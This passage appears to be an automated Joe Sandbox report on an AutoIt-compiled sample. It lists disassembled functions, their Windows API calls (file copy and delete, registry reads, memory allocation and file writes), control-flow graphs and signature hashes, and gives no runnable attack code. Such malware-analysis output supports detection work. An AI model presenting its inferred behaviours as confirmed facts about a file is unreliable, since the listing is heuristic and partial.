                                                                                                                  • Instruction Fuzzy Hash: C2222872E006059FEB259F68DC45BFE7B61EB85318F285229E921B72E1C3358DD0C791
                                                                                                                  Function 00E2FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • _wcscpy.LIBCMT ref: 00E2FA96
                                                                                                                  • _wcschr.LIBCMT ref: 00E2FAA4
                                                                                                                  • _wcscpy.LIBCMT ref: 00E2FABB
                                                                                                                  • _wcscat.LIBCMT ref: 00E2FACA
                                                                                                                  • _wcscat.LIBCMT ref: 00E2FAE8
                                                                                                                  • _wcscpy.LIBCMT ref: 00E2FB09
                                                                                                                  • __wsplitpath.LIBCMT ref: 00E2FBE6
                                                                                                                  • _wcscpy.LIBCMT ref: 00E2FC0B
                                                                                                                  • _wcscpy.LIBCMT ref: 00E2FC1D
                                                                                                                  • _wcscpy.LIBCMT ref: 00E2FC32
                                                                                                                  • _wcscat.LIBCMT ref: 00E2FC47
                                                                                                                  • _wcscat.LIBCMT ref: 00E2FC59
                                                                                                                  • _wcscat.LIBCMT ref: 00E2FC6E
                                                                                                                    • Part of subcall function 00E2BFA4: _wcscmp.LIBCMT ref: 00E2C03E
                                                                                                                    • Part of subcall function 00E2BFA4: __wsplitpath.LIBCMT ref: 00E2C083
                                                                                                                    • Part of subcall function 00E2BFA4: _wcscpy.LIBCMT ref: 00E2C096
                                                                                                                    • Part of subcall function 00E2BFA4: _wcscat.LIBCMT ref: 00E2C0A9
                                                                                                                    • Part of subcall function 00E2BFA4: __wsplitpath.LIBCMT ref: 00E2C0CE
                                                                                                                    • Part of subcall function 00E2BFA4: _wcscat.LIBCMT ref: 00E2C0E4
                                                                                                                    • Part of subcall function 00E2BFA4: _wcscat.LIBCMT ref: 00E2C0F7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$t2
                                                                                                                  • API String ID: 2955681530-945735720
                                                                                                                  • Opcode ID: df84853543f1a3b320b3a9f6423575e581043ae4a7544ff8dd5c526817c24f30
                                                                                                                  • Instruction ID: f367b61c2e05904d40a7b820f210193c39572df2b79fb82aebf18d540fcf4947
                                                                                                                  • Opcode Fuzzy Hash: df84853543f1a3b320b3a9f6423575e581043ae4a7544ff8dd5c526817c24f30
                                                                                                                  • Instruction Fuzzy Hash: 2991C272504345AFDB20EB50D891F9FB3E8FF94304F045829F949A7292DB34EA44CBA2
                                                                                                                  Function 00E0EE0E Relevance: 26.2, APIs: 17, Instructions: 664COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __getptd_noexit
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3074181302-0
                                                                                                                  • Opcode ID: dc490ef674e360cfa1fda65388dd8727a9c16fe39198481ff859e03def2be6f3
                                                                                                                  • Instruction ID: 4ce4b148e353eae744944562598c0c6c32473a631b32f8b88ef65c247a764aa5
                                                                                                                  • Opcode Fuzzy Hash: dc490ef674e360cfa1fda65388dd8727a9c16fe39198481ff859e03def2be6f3
                                                                                                                  • Instruction Fuzzy Hash: FF323870E04245DFDB318F58D840BAE7BB1AF96328F245469E895BB6D2C7709CD1C7A0
                                                                                                                  Function 00E2BFA4 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1072 e2bfa4-e2c054 call e0f8a0 call dff4ea call de47b7 call e2bdb4 call de4517 call e015e3 1085 e2c107-e2c10e call e2c56d 1072->1085 1086 e2c05a-e2c061 call e2c56d 1072->1086 1091 e2c110-e2c112 1085->1091 1092 e2c117 1085->1092 1086->1091 1093 e2c067-e2c105 call e01dfc call e00d23 call e00cf4 call e01dfc call e00cf4 * 2 1086->1093 1094 e2c367-e2c368 1091->1094 1096 e2c11a-e2c1d6 call de44ed * 8 call e2c71a call e03499 1092->1096 1093->1096 1099 e2c385-e2c393 call de47e2 1094->1099 1131 e2c1d8-e2c1da 1096->1131 1132 e2c1df-e2c1fa call e2bdf8 1096->1132 1131->1094 1135 e2c200-e2c208 1132->1135 1136 e2c28c-e2c298 call e035e4 1132->1136 1137 e2c210 1135->1137 1138 e2c20a-e2c20e 1135->1138 1143 e2c29a-e2c2a9 DeleteFileW 1136->1143 1144 e2c2ae-e2c2b2 1136->1144 1140 e2c215-e2c233 call de44ed 1137->1140 1138->1140 1148 e2c235-e2c23b 1140->1148 1149 e2c25d-e2c273 call e2b791 call e02aae 1140->1149 1143->1094 1146 e2c342-e2c356 CopyFileW 1144->1146 1147 e2c2b8-e2c32f call e2c81d call e2c845 call e2b965 1144->1147 1151 e2c36a-e2c380 DeleteFileW call e2c6d9 1146->1151 1152 e2c358-e2c365 DeleteFileW 1146->1152 1147->1151 1168 e2c331-e2c340 DeleteFileW 1147->1168 1153 e2c23d-e2c250 call e2bf2e 1148->1153 1165 e2c278-e2c283 1149->1165 1151->1099 1152->1094 1163 e2c252-e2c25b 1153->1163 1163->1149 1165->1135 1167 e2c289 1165->1167 1167->1136 1168->1094
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E2BDB4: __time64.LIBCMT ref: 00E2BDBE
                                                                                                                    • Part of subcall function 00DE4517: _fseek.LIBCMT ref: 00DE452F
                                                                                                                  • __wsplitpath.LIBCMT ref: 00E2C083
                                                                                                                    • Part of subcall function 00E01DFC: __wsplitpath_helper.LIBCMT ref: 00E01E3C
                                                                                                                  • _wcscpy.LIBCMT ref: 00E2C096
                                                                                                                  • _wcscat.LIBCMT ref: 00E2C0A9
                                                                                                                  • __wsplitpath.LIBCMT ref: 00E2C0CE
                                                                                                                  • _wcscat.LIBCMT ref: 00E2C0E4
                                                                                                                  • _wcscat.LIBCMT ref: 00E2C0F7
                                                                                                                  • _wcscmp.LIBCMT ref: 00E2C03E
                                                                                                                    • Part of subcall function 00E2C56D: _wcscmp.LIBCMT ref: 00E2C65D
                                                                                                                    • Part of subcall function 00E2C56D: _wcscmp.LIBCMT ref: 00E2C670
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E2C2A1
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E2C338
                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E2C34E
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E2C35F
                                                                                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E2C371
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2378138488-0
                                                                                                                  • Opcode ID: ff26239806b6d9db8278feb2b61c927b3a664955b0f8200e5c94353ff06e2fd9
                                                                                                                  • Instruction ID: 2ade7247ffb71ba1e8b3a837dc005be82e12c7953815ef44e5161fa132d84138
                                                                                                                  • Opcode Fuzzy Hash: ff26239806b6d9db8278feb2b61c927b3a664955b0f8200e5c94353ff06e2fd9
                                                                                                                  • Instruction Fuzzy Hash: 4DC11AB1A00229ABDF11EF95DC81EDEB7BDEF49304F1050AAE609F6151DB709A848F61
                                                                                                                  Function 00DE3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00DE3E79
                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00DE3E88
                                                                                                                  • LoadIconW.USER32(00000063), ref: 00DE3E9E
                                                                                                                  • LoadIconW.USER32(000000A4), ref: 00DE3EB0
                                                                                                                  • LoadIconW.USER32(000000A2), ref: 00DE3EC2
                                                                                                                    • Part of subcall function 00DE4024: LoadImageW.USER32(00DE0000,00000063,00000001,00000010,00000010,00000000), ref: 00DE4048
                                                                                                                  • RegisterClassExW.USER32(?), ref: 00DE3F30
                                                                                                                    • Part of subcall function 00DE3F53: GetSysColorBrush.USER32(0000000F), ref: 00DE3F86
                                                                                                                    • Part of subcall function 00DE3F53: RegisterClassExW.USER32(00000030), ref: 00DE3FB0
                                                                                                                    • Part of subcall function 00DE3F53: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00DE3FC1
                                                                                                                    • Part of subcall function 00DE3F53: LoadIconW.USER32(000000A9), ref: 00DE4004
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                  • String ID: #$0$AutoIt v3
                                                                                                                  • API String ID: 2880975755-4155596026
                                                                                                                  • Opcode ID: d6fe8a57ae76a26cdabf5c20f7a76dd83e1616d003534c92093f00ac09bfd5b0
                                                                                                                  • Instruction ID: 977dbdd0c34b5eaf0cd4fac4fdc2e23de10a2f0f2c764cf9d53824d462e4289c
                                                                                                                  • Opcode Fuzzy Hash: d6fe8a57ae76a26cdabf5c20f7a76dd83e1616d003534c92093f00ac09bfd5b0
                                                                                                                  • Instruction Fuzzy Hash: 2C2153B0E05314AFCB00DFABEC49A9ABBF5FB4D350F00415AE204B32A0D77169488FA1
                                                                                                                  Function 00DE3F53 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00DE3F86
                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 00DE3FB0
                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00DE3FC1
                                                                                                                  • LoadIconW.USER32(000000A9), ref: 00DE4004
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                  • API String ID: 975902462-1005189915
                                                                                                                  • Opcode ID: f2765fac5554219f56d20a6f986a03fc707061cfdbbcd519dd22a41c24e33cf4
                                                                                                                  • Instruction ID: b804d9c420c9a7ba1a1da5df96f417f905fbb3f73afec89d63bdaf9ef736305c
                                                                                                                  • Opcode Fuzzy Hash: f2765fac5554219f56d20a6f986a03fc707061cfdbbcd519dd22a41c24e33cf4
                                                                                                                  • Instruction Fuzzy Hash: F721E3B5E04318AFDB40DFA6EC89BCEBBB5FB09740F04421AF611B62A0D7B415488F91
                                                                                                                  Function 010B8B80 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1292 10b8b80-10b8bd2 call 10b8a80 CreateFileW 1295 10b8bdb-10b8be8 1292->1295 1296 10b8bd4-10b8bd6 1292->1296 1299 10b8bfb-10b8c12 VirtualAlloc 1295->1299 1300 10b8bea-10b8bf6 1295->1300 1297 10b8d34-10b8d38 1296->1297 1301 10b8c1b-10b8c41 CreateFileW 1299->1301 1302 10b8c14-10b8c16 1299->1302 1300->1297 1303 10b8c43-10b8c60 1301->1303 1304 10b8c65-10b8c7f ReadFile 1301->1304 1302->1297 1303->1297 1306 10b8ca3-10b8ca7 1304->1306 1307 10b8c81-10b8c9e 1304->1307 1309 10b8ca9-10b8cc6 1306->1309 1310 10b8cc8-10b8cdf WriteFile 1306->1310 1307->1297 1309->1297 1311 10b8d0a-10b8d2f CloseHandle VirtualFree 1310->1311 1312 10b8ce1-10b8d08 1310->1312 1311->1297 1312->1297
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010B8BC5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 823142352-0
                                                                                                                  • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                  • Instruction ID: 9ca7f1de1e0743884db4df8940bd233e469bd76b1a6aae5a0ae89c72504323b3
                                                                                                                  • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                  • Instruction Fuzzy Hash: A0510875A10208FBEF60DFB4CC89FDE77B8AF48701F108955F64AEA180DA7496458B64
                                                                                                                  Function 00DE49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1322 de49fb-de4a25 call debcce RegOpenKeyExW 1325 de4a2b-de4a2f 1322->1325 1326 e541cc-e541e3 RegQueryValueExW 1322->1326 1327 e541e5-e54222 call dff4ea call de47b7 RegQueryValueExW 1326->1327 1328 e54246-e5424f RegCloseKey 1326->1328 1333 e54224-e5423b call de6a63 1327->1333 1334 e5423d-e54245 call de47e2 1327->1334 1333->1334 1334->1328
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00DE4A1D
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E541DB
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E5421A
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00E54249
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                  • API String ID: 1586453840-614718249
                                                                                                                  • Opcode ID: 2d28ceed20e98b4c92bb1bf544fee07bcbef76aa50433adc771c99bb86fcfa10
                                                                                                                  • Instruction ID: c3aa48695f688fe0b6ff7037da4bd6937648184821c84e82c8e82d818a1b0628
                                                                                                                  • Opcode Fuzzy Hash: 2d28ceed20e98b4c92bb1bf544fee07bcbef76aa50433adc771c99bb86fcfa10
                                                                                                                  • Instruction Fuzzy Hash: E4117F71A04208BFEB00ABA5DD86DBF7BBCEF04358F005069F506E2191EA70AE45DB60
                                                                                                                  Function 00DE36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1349 de36b8-de3728 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DE36E6
                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DE3707
                                                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,00DE3AA3,?), ref: 00DE371B
                                                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,00DE3AA3,?), ref: 00DE3724
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CreateShow
                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                  • Opcode ID: 836b948aaca9506267d83a62d744559a4f5833ab6b35924d623e5479c4c31bd0
                                                                                                                  • Instruction ID: 74b414d20fe282842d43a086f7df9c9f1e8585317bca2a9a73507de2b1132e34
                                                                                                                  • Opcode Fuzzy Hash: 836b948aaca9506267d83a62d744559a4f5833ab6b35924d623e5479c4c31bd0
                                                                                                                  • Instruction Fuzzy Hash: 67F0DA71A482E47EE7315757AC89E673E7DE7CBF60F00405FFA08B21A0C5612899DAB1
                                                                                                                  Function 00DE4A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DE5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00EA1148,?,00DE61FF,?,00000000,00000001,00000000), ref: 00DE5392
                                                                                                                    • Part of subcall function 00DE49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00DE4A1D
                                                                                                                  • _wcscat.LIBCMT ref: 00E52D80
                                                                                                                  • _wcscat.LIBCMT ref: 00E52DB5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscat$FileModuleNameOpen
                                                                                                                  • String ID: 8!$\$\Include\
                                                                                                                  • API String ID: 3592542968-2226600046
                                                                                                                  • Opcode ID: a66a028ad0d1812d584d566f7ce3646a4fe920d7d9bdf2b9ff829c768328f810
                                                                                                                  • Instruction ID: 4242c9452ef9acd6b3eea70a51dedc6cbb9207d25923314d951b79ef253943a2
                                                                                                                  • Opcode Fuzzy Hash: a66a028ad0d1812d584d566f7ce3646a4fe920d7d9bdf2b9ff829c768328f810
                                                                                                                  • Instruction Fuzzy Hash: 85514F714093809FC714EF5AD88189AB3F4FFAE300B40592EF749B7261EB30A948CB61
                                                                                                                  Function 00DE51AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1507 de51af-de51c5 1508 de51cb-de51e0 call de6b0f 1507->1508 1509 de52a2-de52a6 1507->1509 1512 e53ca1-e53cb0 LoadStringW 1508->1512 1513 de51e6-de5206 call de6a63 1508->1513 1516 e53cbb-e53cd3 call de510d call de4db1 1512->1516 1513->1516 1517 de520c-de5210 1513->1517 1526 de5220-de529d call e00d50 call de50e6 call e00d23 Shell_NotifyIconW call decb37 1516->1526 1528 e53cd9-e53cf7 call de518c call de4db1 call de518c 1516->1528 1519 de5216-de521b call de510d 1517->1519 1520 de52a7-de52b0 call de6eed 1517->1520 1519->1526 1520->1526 1526->1509 1528->1526
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DE522F
                                                                                                                  • _wcscpy.LIBCMT ref: 00DE5283
                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DE5293
                                                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E53CB0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
